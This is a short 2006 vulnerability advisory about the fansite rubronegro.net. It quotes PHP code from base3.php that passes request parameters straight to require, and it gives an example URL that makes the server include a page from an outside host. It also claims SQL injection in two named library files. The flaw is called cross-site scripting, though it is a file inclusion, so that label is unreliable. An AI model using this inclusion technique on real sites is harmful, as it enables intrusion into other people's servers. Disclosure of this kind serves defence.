Author: Rephumos
Date: 22.feb.2006
URL: http://www.rubronegro.net



--- Description:

Rubronegro.net is a fansite for the brazilian soccer team Atlético Paranaense.



--- Vulnerability - Cross scripting:

Website has a cross site scripting issue, taken from the code below:

$temp = $path."/".$link;
require $temp;

On the lines 40 and 41 of www.rubronegro.net/base3.php

Example: The following link -
http://www.rubronegro.net/base3.php?path=clube/baixada&link=patrimonio_hist
Acesses the file patrimonio_hist (with no extension) in the clube/baixada foder.

It can be easily changed to acces the last 100 advisories of Packet Storm security website, like this:
http://www.rubronegro.net/base3.php?path=http://www.packetstormsecurity.org&link=advisories100.html

The code enables the website to be processed as af it were in the server.



--- Vulnerability - SQL Injection:

The following files:
base/config.lib.php
base/function.lib.new.php

are accessible with the information above and vulnerable to sql injections.



--- Status:

Vulnerability found: 10 feb 2006
Vulnerability notified: 11 feb 2006
Published after no response: 22 feb 2006


--- Greetings:

To my homies and all brazilian hackers around ;D